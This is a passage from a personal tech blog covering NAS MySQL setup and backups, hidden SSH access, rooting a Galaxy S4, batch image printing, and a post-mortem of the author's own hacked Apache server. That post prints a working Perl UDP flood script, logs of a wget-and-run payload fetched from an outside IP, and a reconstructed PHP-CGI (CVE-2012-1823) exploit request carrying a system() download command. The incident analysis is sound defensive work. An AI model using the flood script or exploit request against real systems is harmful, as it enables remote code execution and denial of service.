| log                | 
| mysql              | 
| test               | 
+--------------------+
5 rows in set (0.00 sec)
  • To start the server on reboot, open /etc/rc.local and add:
# Start MySQL server
/opt/share/mysql/mysql.server start

Note: This last step will only work if you followed instruction in the “Custom Boot Scripts” section.

You are done!

Importing the Wiki Database

mysql@ix2-dl:/# mysql -u root -p
mysql> create database wikidb;
mysql> CREATE USER 'wiki'@'%' IDENTIFIED BY '********';
mysql> GRANT ALL PRIVILEGES ON wikidb.* TO 'wiki'@'%';
mysql@ix2-dl:/# mysql -u wiki -p wikidb < wikidb-db-backup.sql

Daily Backups of the Wiki Database

The wiki database is backed up and versioned with RCS daily. Here is the setup:

  • Install RCS:
root@ix2-dl:/# ipkg install rcs
  • Backup script (/opt/var/mysql/mysqlbackup.cron.sh):
#!/bin/bash

# DATABASE DEFINITION SECTION
# Database specified with a "dbname user password" triple
databases=("wikidb wiki ******")
# END DATABASE DEFINITION SECTION

WD="/nfs/backups/wiki"
MYSQLDUMP="/opt/bin/mysqldump"
CI="/opt/bin/ci"
AWK="/usr/bin/awk"

numdb=${#databases[@]}

cd $WD

for database in "${databases[@]}"; do
 db=$(echo $database   | $AWK '{print $1}')
 user=$(echo $database | $AWK '{print $2}')
 pass=$(echo $database | $AWK '{print $3}')

 filename=${db}-db-backup.sql

 echo "Backing up database $db..."
 $MYSQLDUMP -u $user --password=$pass $db > $filename 2> MY_SQL_DUMP_ERROR_$db
 if [[ $? -ne 0 ]] ; then
   # The backup has failed. Send a notification e-mail
   #
   echo "WIKI BACKUP FAILURE!"
 else
   # Success. Delete the error file if any and check in the new backup into RCS
   #
   echo "Creating an RCS version for $db..."
   rm MY_SQL_DUMP_ERROR_$db 2>&1 > /dev/null
   export TMPDIR=$WD
   echo . | $CI -l -d"`date`" $filename
 fi

done

Cron Job

/etc/cron.daily/mysql_backup:

#!/bin/sh
/opt/var/mysql/mysqlbackup.cron.sh

Credits

http://vincesoft.blogspot.ca/2012/01/how-to-run-program-at-boot-on-iomega.html
http://iomega.nas-central.org/wiki/Hacking_(Home_Media_CE)
http://www.nslu2-linux.org/
http://techmonks.net/installing-transmission-and-dnsmasq-on-a-nas/

SSH access to Lenovo ix2-dl NAS

25 Tuesday Feb 2014

Posted by valblant in NAS

≈ 9 Comments

I recently purchased the Lenovo ix2-dl NAS, b/c it was time to upgrade my storage capacity and I did not want to deal with my current setup anymore. My datahost box runs LVM on top of software RAID 1, on Slackware 10.2, with 5 drives in the machine :).

I was attracted to the Lenovo ix2-dl, b/c it is small, quiet, provides RAID 1 and costs $90 at Tigerdirect, which is significantly cheaper than any other NAS I came across.

This NAS box has a 1.5GHz ARM Feroceon 88FR131 processor, 256MB of RAM and runs LifeLine Linux, which is a distro developed by Iomega’s parent company EMC, specifically to power their NAS boxes.

The only concern I immediately had with the ix2-dl, was the lack of SSH access to the box. A Linux box w/o SSH access is extremely irritating, so I decided to research this further.

Enabling SSH Access

Turns out that there is a hidden Diagnostics page available in the web interface at /manage/diagnostics.html . This page allows the user to set an SSH port and root password. The catch is that the selected password is prefixed by the word ‘soho‘. So if you select ‘GOD’ as your password on the page, the actual password is ‘sohoGOD‘. You can change the password to whatever you want with the ‘passwd’ command.

Once you log in, you can work with the drives, software raid, Apache, NFS, etc. just like you are used to on any Linux box.

Credits

Most of the information was obtained from here: https://blog.liftsecurity.io/jon-lamendola

 

Step By Step Guide to Rooting your Galaxy S4 (SGH-I337M) from Ubuntu

16 Thursday Jan 2014

Posted by valblant in Android

≈ 1 Comment

Tags

android, galaxy s4, root, ubuntu

This guide was written by experimenting with the Canadian (Telus) version of Galaxy S4. If you have a different phone, this guide can still be useful for understanding the principles behind the process – you’ll just need to make sure that you get the right bootloader image for your phone.

I am assuming that you are using a Linux computer in this guide.

Before We Begin

The strangest and most stressful thing that happened to me during this process is when the key combination for booting the phone into Recovery mode stopped working. Normally we boot into Recovery by turning off the phone and holding down Vol Up & Home & Power buttons. This worked fine for a while, and then suddenly stopped working. If this happens to you check out the Troubleshooting section below for a solution.

Install ClockworkMod (CWM) Recovery Bootloader

  • Install firmware flash utility that speaks the Odin protocol (Samsung’s proprietary firmware flash software)
	sudo add-apt-repository ppa:modycz/heimdall
	sudo apt-get update
	sudo apt-get install heimdall
  • Download koush’s ClockworkMod Recovery image: http://download2.clockworkmod.com/recoveries/recovery-clockwork-touch-6.0.4.4-jfltecan.img. If you have a different phone, select the image from here: http://www.clockworkmod.com/rommanager.
  • Power off the Galaxy S4 and connect the USB adapter to the computer but not to the Galaxy S4.
  • Now boot the Galaxy S4 into download mode by holding down Vol Down & Home & Power. Accept the disclaimer. After this insert the USB cable into the device. Your phone is now ready to flash a new Recovery bootloader via the Odin protocol.
  • On the computer, open a terminal and run the following command from the Heimdall directory:
    sudo heimdall flash --RECOVERY recovery-clockwork-6.0.3.2-jfltecan.img --no-reboot

    A blue transfer bar will appear on the device showing the recovery image being transferred.

  • Turn off the phone
  • Boot the phone again by holding Vol Up & Home & Power. If you find that your phone just keeps rebooting instead of going into CWM Recovery, please read the Troubleshooting section for a solution.
  • CWM Recovery will present you with a text menu that you can navigate with the Volume keys, and select with Power key. Select the first option: “Reboot System Now”
  • The Galaxy S4 now has ClockworkMod Recovery installed!

Backup the Stock Image

This is a good time to make a backup of your entire phone, just in case you need to get back to the stock configuration later. DO NOT SKIP THIS STEP!

  • Reboot back into CWM Recovery by holding Vol Up & Home & Power during startup.
  • Go to “backup and restore” -> “backup to /sdcard”. This will take a while, so just wait. At the end of this process, your backup will be stored in “/mnt/shell/emulated/clockworkmod/backup/” on the phone’s file system. You can’t access that from your phone directly yet, but you can use the “adb pull” (https://developer.android.com/tools/help/adb.html) to transfer it to your PC though. You’ll also be able to do it easily after we finish rooting the phone, so no need to do that now.

Rooting The Phone

  • Download the ROM update, which will introduce the necessary changes for rooting your Galaxy S4: http://download.clockworkmod.com/superuser/superuser.zip

NOTE: I had a lot of trouble with this ROM as of November 29th, 2013. The author told me that he’ll fix it, so it is likely that you will not experience any problems now. However, if you find that you follow the instructions, yet your phone is not getting rooted, see the Troubleshooting section for a solution.

  • Copy “superuser.zip” into the root of your phone’s internal file system (by that I mean what the phone shows you as a root – in reality the root directory you see from the phone is actually mounted here: /mnt/shell/emulated/0). There are many ways to do this, such as mounting the phone over USB, over the network, using adb, etc. There are many tutorials out there that show you how to copy files from your computer to your phone.
  • Shut down again. Boot into CWM Recovery by holding Vol Up & Home & Power.
  • Navigate to “install zip from sdcard” -> “choose zip from sdcard” -> “0/”. You will find your ‘superuser.zip‘ here. Select it and confirm.
  • You’ll get some text at the bottom and a Success message. Click ‘Back’ and select ‘Reboot’
  • Your phone is now rooted! See next section for making sure that everything worked correctly.

Confirming Correct Operation

  • You should have a new app installed called Superuser. This is where you can configure how other apps get access to root, as well as see the log of apps that requested root.
  • Download an app called Root Checker: https://play.google.com/store/apps/details?id=org.freeandroidtools.root_checker
  • Use the app to make sure that root access is granted. If it isn’t see the Troubleshooting section.

Install ROM Manager

ROM Manager is an extremely useful app that makes a lot of the operations we just did possible from a single click. It will also manage your backups, keep your CWM Recovery install up to date, and keep track of new ROMs, so you should install it:
https://play.google.com/store/apps/details?id=com.koushikdutta.rommanager

Remember that backup we took in the beginning from CWM Recovery? Go to “Manage and Restore Backups”, and you’ll see your backup in the list. Select “Download Backups”, and you’ll be offered a download link to transfer your backup to your PC for safe keeping.

Troubleshooting

Recovery Boot Loop

Many S4 owners have a problem with their phones going into an endless loop of restarts when trying to boot into Recovery Mode.

Do the following: when your phone is off, press VOLUME UP button and POWER BUTTON at the same time. Keep holding it until the actual recover options appear on your phone screen. Do not let go when you see that little message show up on upper left screen. Keep holding it until you actually see the recovery options on your screen. Now, if you see that your phone is going into another restart without options appearing, just keep holding the VOLUME UP button and hold it until you see the recovery options show up on your screen.

superuser ROM failing to root the phone

I had this problem after downloading http://download.clockworkmod.com/superuser/superuser.zip on November 29th, 2013. Although it is very likely fixed now, the fact that you are reading this section suggests otherwise, so let’s give this a try.

First, let’s take a look at exactly what changes superuser.zip ROM makes to the file system in order to root the phone:

  1. Replacing the ‘su‘ binary with another that has some added functionality, and that has the setuid bit [http://en.wikipedia.org/wiki/Setuid] set on it. This is what allows the apps to elevate privileges.
  2. An Android app that acts as a front end to ‘su‘, and keeps track of which apps are allowed to use it, and which ones are not.

It appears that on Galaxy S4 (Canadian) with Android 4.2+ installed, there have been some kernel changes that make the seteuid system call fail like this:

 seteuid (root) failed with 13: Permission denied

You can see this message if you use adb logcat while trying to elevate privileges.

As a result of this error, the phone does not get rooted. This problem is easy to fix, but it requires some code changes. There is some detailed info about this problem and the fix for it here: https://github.com/koush/Superuser/issues/196

The problem for me was that the official version of superuser.zip has not yet been updated with the fix for some reason. In any case, I have taken the patch from GitHub and updated the ROM. You can get the fixed version here: http://vace.homelinux.com/unprotected/superuser/fixed-superuser.zip

Follow exactly the same steps with this file as described above and everything should work out.

 

I just got PWNED by “PHP 5.x Remote Code Execution Exploit”

05 Thursday Dec 2013

Posted by valblant in Uncategorized

≈ Leave a comment

Today my home server dropped off the net, thus cutting me off from all of my tunnels and email services for the entire day. Upon returning home, I found that the reason for this outage was a UDP flood ping that was originating from my server, and consuming 100% of my CPU and 100% of my bandwidth. Further inspection showed that my Apache 2.2 server running on Lucid Lynx was hacked. In this post I’ll document the steps I took in order to figure out and fix the problem.

Initial Observations

After logging in to my server I ran the top command and found that a perl process was taking up all of the CPU.

root@gatekeeper:~# ps -axf
19914 ?        S      0:00 sh -c cd /tmp;wget 146.185.162.85/.../u;perl u 154.35.175.201 6660 500
19918 ?        R    506:21  \_ perl u 154.35.175.201 6660 500
19916 ?        S      0:00 sh -c cd /tmp;wget 146.185.162.85/.../u;perl u 154.35.175.201 6660 500
19922 ?        R    506:12  \_ perl u 154.35.175.201 6660 500

These processes were owned by www-data user, which is the Apache user on Ubuntu.

Sure enough, the mysterious ‘u’ file being executed by perl was there:

root@gatekeeper:~# cd /tmp; ls -l
-rw-r--r-- 1 www-data www-data   1089 2013-12-04 11:53 u
-rw-r--r-- 1 www-data www-data   1089 2013-12-04 11:53 u.1

The contents of the file:

root@gatekeeper:~#  cat u
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0   <time>\n";
 printf "if arg1/2 =0, randports/continous packets.\n";l
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1];
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

This script initiates a UDP flood ping of the provided address. In this case 154.35.175.201:6660. Note that the $time parameter is not used, which is why this turns into an all-destroying flood ping.
The malicious script was downloaded from here: http://146.185.162.85/…/. Note that this directory contains a whole bunch of interesting malicious code, including an IrcBot and a PayPal phishing page.

So, definitely h4x0red. But how?!?!?

Attack Analysis

  • Ran last -i, to see if there were any logins besides the ones I expect to be there. Nope.
  • Checked the timestamp and contents on /etc/passwd. Nope.
  • Checked for suspicious entries in /var/log/syslog and /var/log/auth.log. Nope.
  • Downloaded ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz to scan for any known root kits. Nope.

It appears that Apache2 was the attack vector, especially since the permissions on the downloaded files belong to www-data user.

Check our CGI configuration:

root@gatekeeper:~# vi /etc/apache2/sites-enabled/000-default
      ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
      <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
</Directory>

Check what we have in /usr/lib/cgi-bin:

root@gatekeeper:~# ls -l /usr/lib/cgi-bin
lrwxrwxrwx 1 root root      29 2012-04-22 18:57 php -> /etc/alternatives/php-cgi-bin
-rwxr-xr-x 1 root root 7836616 2013-09-04 14:22 php5

Check the logs around 2013-12-04 11:53 timestamp, since this is when the ‘u’ file was downloaded into /tmp. I could not find an exact match in /var/log/apache2/access.log, but there was a lot of interesting stuff in there:

46.16.169.53 - - [01/Dec/2013:11:38:50 -0600] "POST //%63%67%69%2D
%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63
%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%
66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3
D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73
%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%
65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%7
0%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65
%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%
72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%7
4%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%6
9%6E%70%75%74+%2D%6E HTTP/1.1" 504 508 "-" "-"

WTF is that?! Writing a quick Ruby script to decode:

#!/usr/bin/ruby

input="%63%67%69%2D%62%69%6E/%70%68%70%35?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E"

input.split('%').each {|c|
	if ( c.length == 2 )
		print c.hex.chr
	elsif (c.length == 3)
		print "#{c[0..1].hex.chr}#{c[2].chr}"
	end
}

We get the following:

//cgi-bin/php5?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d
+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n

Taking a look at /var/log/apache2/error.log we see scary stuff like this:

[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] --2013-12-04 11:57:22--  http://146.185.162.85/.../u
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] Connecting to 146.185.162.85:80...
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] connected.
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] HTTP request sent, awaiting response...
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] connected.
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] HTTP request sent, awaiting response...
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] 200 OK
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] Length: 1089 (1.1K)
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] Saving to: `u'
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170]
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170]      0K
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] .
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170]
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] 100% 26.8M=0s
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170]
[Wed Dec 04 11:57:22 2013] [error] [client 94.23.67.170] 2013-12-04 11:57:22 (26.8 MB/s) - `u' saved [1089/1089]

ok, so whatever this does, it obviously somehow exploits the php5 executable. We are not supposed to be able to run php5 directly (b/c php5 binary is compiled with force-cgi-redirect enabled: http://fi2.php.net/security.cgi-bin), yet this somehow bypasses that security.

And here’s the explanation of how the exploit works:

On Debian and Ubuntu the vulnerability is present in the default install
of the php5-cgi package. When the php5-cgi package is installed on Debian and
Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
the binary because this binary has a security check enabled when installed with
Apache http server and this security check is circumvented by the exploit.
When accessing the php-cgi binary the security check will block the request and
will not execute the binary.
In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
check is done when the php.ini configuration setting cgi.force_redirect is set
and the php.ini configuration setting cgi.redirect_status_env is set to no.
This makes it possible to execute the binary bypassing the Security check by
setting these two php.ini settings.
Prior to this code for the Security check getopt is called and it is possible
to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
-d switch. If both values are set to zero and the request is sent to the server
php-cgi gets fully executed and we can use the payload in the POST data field
to execute arbitrary php and therefore we can execute programs on the system.
apache-magika.c is an exploit that does exactly the prior described. It does
support SSL.
/* Affected and tested versions
PHP 5.3.10
PHP 5.3.8-1
PHP 5.3.6-13
PHP 5.3.3
PHP 5.2.17
PHP 5.2.11
PHP 5.2.6-3
PHP 5.2.6+lenny16 with Suhosin-Patch
Affected versions
PHP prior to 5.3.12
PHP prior to 5.4.2
Unaffected versions
PHP 4 - getopt parser unexploitable
PHP 5.3.12 and up
PHP 5.4.2 and up
Unaffected versions are patched by CVE-2012-1823.

This explanation was obtained from: http://www.exploit-db.com/exploits/29290/

So with this information, I gather that the full exploit looked something like this:

POST //cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: vace.homelinux.com
Connection: keep-alive
Content-Length: 78
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.97 Safari/537.22
Content-Type: application/x-www-form-urlencoded

<? system("/tmp;wget 146.185.162.85/.../u;perl u 154.35.175.201 6660 500"); ?>

I was not able to recreate the exploit with this exact request, so there must be some additional details required to make it work, but I am fairly certain that this is the general mechanism that was used to carry out the attack.

Securing The Server

Lucid is a fairly old distro, so I did not want to deal with upgrading the php package. I am sure it would be dependency hell. Instead, I followed the advice given on this thread (http://www.howtoforge.com/forums/showthread.php?t=63740&page=3) and installed mod_security.

There are good instructions on how to do that found here: http://www.linuxlog.org/?p=135

One thing to note is that if you are using Lucid, you will not be able to install the latest ModSecurity rules (v2.7.5), so don’t download those. Instead use the link provided in the article.

Here’s my /etc/apache2/conf.d/modsecurity:

<ifmodule mod_security2.c>
  SecRuleEngine On
  SecDebugLog /var/log/apache2/modsecurity.log
  SecDebugLogLevel 3
  SecAuditLogParts ABIJDEFHZ

  # For testing: http://vace.homelinux.com/?test=MY_UNIQUE_TEST_STRING
  SecRule ARGS "MY_UNIQUE_TEST_STRING"\
  "phase:1,log,deny,status:503"

  # These are too noisy with warnings, so turning them off
  SecRuleRemoveById 960032
  SecRuleRemoveById 960034

  Include /etc/apache2/mod_security_rules/*.conf
</ifmodule>

Conclusion

Since I was not able to recreate the exploit, I am not 100% sure if this solution worked. I’ll keep my eye on the logs over the following weeks and I’ll post here again if there are any unexpected developments.

Printing Many Images of Fixed or Variable Size in Linux

08 Tuesday Oct 2013

Posted by valblant in Uncategorized

≈ Leave a comment

Tags

image processing, printing

I thought I’d share some things I learned recently after having to format and print hundreds of images automatically. I’ll discuss printing images of the same size, as well as printing images of different sizes.

The most difficult step in the process is to format the image on the page. This is very easy to do manually by using OpenOffice, for example, but how do you do it from command line to hundreds of images?

Images of Fixed Size

  • Open Inkscape and import a test raster image. It doesn’t matter what image you choose, as long as its dimensions match the dimensions of your target images.  Position the image on the page as you desire.
  • Save the image as drawing.svg.
  • In the directory where you saved your SVG, create a subdirectory and place all your target images there.
  • In the same subdirectory create a script called generate_pdf.sh:
#!/bin/bash

rm *.svg
rm *.pdf

DIR=`pwd`

for i in `find . -iname "*jpg" -o -iname "*png"`; do
  SVG_NAME=${i%%.jpg}.svg
  PDF_NAME=${i%%.jpg}.pdf
  IMG_NAME=${i#./}
  cp ../drawing.svg $SVG_NAME
  sed -i "s,IMAGE_NAME,$DIR/$IMG_NAME," $SVG_NAME

  inkscape --without-gui --export-pdf=$PDF_NAME $SVG_NAME
done
  • Run the script, and it will generate an SVG and a PDF file for each image.
  • Print all PDF files:
$ IFS=$'\n'; for i in `find . -iname "*pdf"`; do echo $i; lpr -P printer_name $i; done

You can find out the name of the printer by running this command:

$ lpstat -d -p

Images of Variable Size

The easiest way I found is to use ImageMagic.

$ convert -rotate "90>" -page Letter *.jpg test.pdf

Then open test.pdf and print all pages. Be sure to check each page before printing, since you may need to print a couple of images manually.

← Older posts
Newer posts →

Blog at WordPress.com.

  • Subscribe Subscribed
    • N1nja Hacks
    • Already have a WordPress.com account? Log in now.
    • N1nja Hacks
    • Subscribe Subscribed
    • Sign up
    • Log in
    • Report this content
    • View site in Reader
    • Manage subscriptions
    • Collapse this bar
 

Loading Comments...